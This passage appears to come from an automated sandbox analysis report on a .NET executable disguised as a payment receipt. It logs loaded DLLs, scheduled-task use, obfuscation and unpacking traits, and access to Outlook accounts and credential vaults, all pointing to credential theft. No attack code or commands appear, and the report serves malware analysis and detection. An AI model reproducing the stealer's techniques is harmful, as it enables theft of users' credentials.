                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.cfgJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: SwiftCopy_PaymtRecpt121228.exeStatic file information: File size 1193984 > 1048576
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x112400
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pUIh.pdbSHA256y` source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr
                Source: Binary string: pUIh.pdb source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: SwiftCopy_PaymtRecpt121228.exe, Form11.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: eaJOpx.exe.0.dr, Form11.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.cs.Net Code: X2iKjixfC7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.cs.Net Code: X2iKjixfC7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.cs.Net Code: X2iKjixfC7 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A54F7A pushad ; iretd 0_2_05A54F81
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A548E0 pushad ; retf 0_2_05A548E1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A54848 push eax; retf 0_2_05A54849
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A5BA98 push esp; iretd 0_2_05A5BAA5
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFD7AD push es; iretd 0_2_06EFD7E8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFD5EA push esi; ret 0_2_06EFD5ED
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFDDE0 push eax; retf 0_2_06EFDDE1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFD5A0 push es; iretd 0_2_06EFD5B4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFD825 push es; iretd 0_2_06EFD82C
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10002806 push ecx; ret 7_2_10002819
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C24658 push edx; retf 0002h9_2_02C2465A
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C247B0 push esi; retf 0002h9_2_02C247B2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C24779 push esi; retf 0002h9_2_02C2477A
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C29873 pushfd ; retf 9_2_02C29876
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C25F23 pushfd ; retf 9_2_02C25F26
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C29D01 pushfd ; retf 0002h9_2_02C29D02
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A9608 push cs; retf 9_2_060A9616
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A4F7B pushad ; iretd 9_2_060A4F81
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060ABA98 push esp; iretd 9_2_060ABAA5
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A4848 push eax; retf 9_2_060A4849
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A48E0 pushad ; retf 9_2_060A48E1
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758D5EA push esi; ret 9_2_0758D5ED
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758DDE0 push eax; retf 9_2_0758DDE1
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07583B02 push cs; retf 9_2_07583B0E
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0779DE43 pushfd ; retf 9_2_0779DE4E
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0779CA8E push cs; iretd 9_2_0779CA8F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0779E9FB push cs; retf 9_2_0779EA06
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00434006 push ecx; ret 12_2_00434019
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004567F0 push eax; ret 12_2_0045680E
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00463EF3 push ds; retf 12_2_00463EEC
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: section name: .text entropy: 7.753706861790718
                Source: eaJOpx.exe.0.drStatic PE information: section name: .text entropy: 7.753706861790718
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ooK3AkAQIu8efntkad.csHigh entropy of concatenated method names: 'F2NuefQARF', 'ulTumdT508', 'U4tuikyOIX', 'Qlpi9q8EHL', 'D8VizRdOq8', 'ynpuE8aHMv', 'N0LuC16cb6', 'XEQuX6qxBo', 'w9Xup8Tcxx', 'oNwuKBL4ll'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, lCdxmZGJ13p9rdDdZF.csHigh entropy of concatenated method names: 'Dispose', 'KFxCLph07m', 'lP0X2eiHDJ', 'qfPKk2RFlX', 'Q5PC9r818A', 'yLQCz6Su1P', 'ProcessDialogKey', 'CcjXE9OTkk', 'SYYXCXRXIY', 'LsaXXM3IMV'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, z9OTkkLIYYXRXIYAsa.csHigh entropy of concatenated method names: 'N9Y3YUvA7W', 'HuP32iOUXv', 'tm73olTsla', 'z0T3QKjHNI', 'OpW3cLVFvr', 'wmI3Dujfup', 'fEU3Ag3rr3', 'QRc3F1j6Cs', 'vFU3aLFkwd', 'iZy3baCbqQ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, hU0Fe9zGldXS0Zr1mm.csHigh entropy of concatenated method names: 'IttZ5u5Po6', 'bA7ZWyULpA', 'FuFZ02M4Gf', 'KqCZYcJcmF', 'UrHZ2UCZso', 'adAZQwJHh2', 'AYVZcl52pR', 'DTCZUmTiwj', 'xofZgXpO31', 'dtFZs8PBRb'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.csHigh entropy of concatenated method names: 'e4Lphsfw6d', 's9XpeN6bK2', 'pMRpGF6MRr', 'gt4pmUcDg4', 'DITplFwmd8', 'Uk1piVKaEY', 'Y6Bpuq85Ei', 'T9Ipq5U8RI', 'AnypTCdkJJ', 'lidp85By9j'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, DlfsjvW8qU2neLHntS.csHigh entropy of concatenated method names: 'DhcGRp3UHU', 'sYmGIllQZQ', 'wxDGktkLoP', 'OusGJk5yMI', 'mBnGN1cbFv', 'Be5Gf4tmIw', 'alZG7nFKWj', 'HrkGVoISco', 'xwMGLRJLg1', 'mNEG9WjBKi'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, JiRbLSYRlBl4b0VgTN.csHigh entropy of concatenated method names: 'Gnlih8TKvZ', 'zVMiGU0SGN', 'vhpilWJYAL', 'spJiuDZe9r', 'm0uiqogaRG', 'GZYlNTsrxL', 'hnWlfKONqO', 'Ic4l76Snql', 'qq6lVjrsuD', 'wI6lLRSaAP'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, CVXAVe7nWDFxph07mH.csHigh entropy of concatenated method names: 'lfN31huEZn', 'x4L34MgUej', 'qJl336xcwI', 'OsK3wWaSHC', 'lYc361il2U', 'wI93UI96Gg', 'Dispose', 'YZKMebO1fX', 'bflMGDr1Fv', 'fT3MmoxwAZ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, eypnOtCKX1eP4JZEaNs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bPXS3lbc2i', 'jhYSZtbsa6', 'I1BSw6NYOX', 'RijSSEvUpr', 'S62S6y1jVP', 'e4ySdpCWPO', 'LVISUxnroj'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, q3IMVh9eXLPFjsBI68.csHigh entropy of concatenated method names: 'VyfZm3XTtf', 'qDLZl3geNL', 'PQhZiL4JCa', 'PHXZuWloVa', 'TLPZ3gr9wA', 'XtNZquhPuR', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, W0GiVD07L1dakng1fT.csHigh entropy of concatenated method names: 'ufGmPc6fx8', 'Cm6m51Ni4y', 'kUHmWHPVZ0', 'a8nm0OtQqr', 'yStm1oT8Nx', 'GgxmvV7jS6', 'hlrm49FaMP', 'vdHmMe0aKP', 'y8Hm3hJL4S', 'UfLmZnPWGa'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, UT08udX6WOGG1Xdpo8.csHigh entropy of concatenated method names: 'vQijmec5j', 'fRxPdjepW', 'tdu5Sij0e', 'pUpBNTGrG', 'Bp20Mq0rn', 'i0uxUgMWn', 'egcTkbRqS0x1DCXqCI', 'jpqEOM19i4GK7353Iu', 'W1SMfdqFK', 'LKyZVyMyo'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ERn86KasASr1vtjG5F.csHigh entropy of concatenated method names: 'mXnugMDxUb', 'dsyusLDu8S', 'FHyujnOjqU', 'fDduP4Hjgy', 'KLmutvsNTb', 'ypAu5sxZKr', 'MLXuBb6DBs', 'z6FuW5C34O', 'T4Iu0f2Zn0', 'KHSuxZ2P3x'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, QqHRLaRpJUUjNPWaM6.csHigh entropy of concatenated method names: 'npl1bedkBg', 'I051nMu9KL', 'D6T1RNOug8', 'f8O1IOGhMt', 'VC612NYrjF', 'i7Z1oc7DTG', 'FvX1Q3jON6', 'r2g1cOS5Qx', 'BkR1DelgRy', 'xyr1AiJuwb'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ewK3dTKT9pbHQwq4m4.csHigh entropy of concatenated method names: 'rCWCulfsjv', 'mqUCq2neLH', 'J7LC81dakn', 'x1fCrTkhkT', 'Ot1C1RtciR', 'NLSCvRlBl4', 'ISa2h4pWZNLcAnEwMB', 'qgsLUkztL6r8CNyPmK', 'TCxCCS5i6s', 'Kr2Cp8VVuh'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, I4yCbBHuJi9Z8K8qlV.csHigh entropy of concatenated method names: 'wNwOWqRYUx', 'gP0O0KCr7W', 'oJqOYFtcOT', 'cVbO2Qh4NV', 'gGeOQg9hgp', 'KFcOcXtdv1', 'kcMOALICrX', 'onyOFXN1pd', 'MMXObMLC9i', 'e2rOyZ5DCj'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, CljGtOkAwYyBjbav2l.csHigh entropy of concatenated method names: 'ToString', 'gxpvy6Zs2P', 'fVfv2KKZyX', 'JdavoCFodL', 'MEcvQxhdak', 'KIDvcjImfM', 'DrKvD08QR9', 'gu0vAnAavW', 'jbyvFArmSb', 'gYlvahD8vP'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, vLjfL3CEHUOl1VQ9Tso.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYnZyLIB2E', 'uWTZn1saqq', 'MbtZHkR7TY', 'eI8ZRINpeC', 'peNZIRIstg', 'crEZkN9PHw', 'gtsZJVprfU'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, oijrmXCCIbXkLRKl9M7.csHigh entropy of concatenated method names: 'IZvZ99vJ0v', 'Y1JZzJjhSB', 'erOwEjPYwo', 'aPhwCqA0Qy', 'TYSwXn9vdn', 'I8BwpWeG41', 'dxGwKHTjSs', 'RTBwhb0JKX', 'mD1weMWGhm', 'mDjwG0YtmJ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ruWa8kfTr9ZynRX962.csHigh entropy of concatenated method names: 'baU4VFvOhR', 'R9u49qq8Fq', 'RPjMEP8Qyl', 'oVaMCmwbgw', 'J6Z4ygaOYp', 'UOQ4n6RtiL', 'abp4HMJRyj', 'OHP4RWMjPl', 'rWp4IlrEKw', 'Kct4ka3S7W'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ooK3AkAQIu8efntkad.csHigh entropy of concatenated method names: 'F2NuefQARF', 'ulTumdT508', 'U4tuikyOIX', 'Qlpi9q8EHL', 'D8VizRdOq8', 'ynpuE8aHMv', 'N0LuC16cb6', 'XEQuX6qxBo', 'w9Xup8Tcxx', 'oNwuKBL4ll'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, lCdxmZGJ13p9rdDdZF.csHigh entropy of concatenated method names: 'Dispose', 'KFxCLph07m', 'lP0X2eiHDJ', 'qfPKk2RFlX', 'Q5PC9r818A', 'yLQCz6Su1P', 'ProcessDialogKey', 'CcjXE9OTkk', 'SYYXCXRXIY', 'LsaXXM3IMV'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, z9OTkkLIYYXRXIYAsa.csHigh entropy of concatenated method names: 'N9Y3YUvA7W', 'HuP32iOUXv', 'tm73olTsla', 'z0T3QKjHNI', 'OpW3cLVFvr', 'wmI3Dujfup', 'fEU3Ag3rr3', 'QRc3F1j6Cs', 'vFU3aLFkwd', 'iZy3baCbqQ'
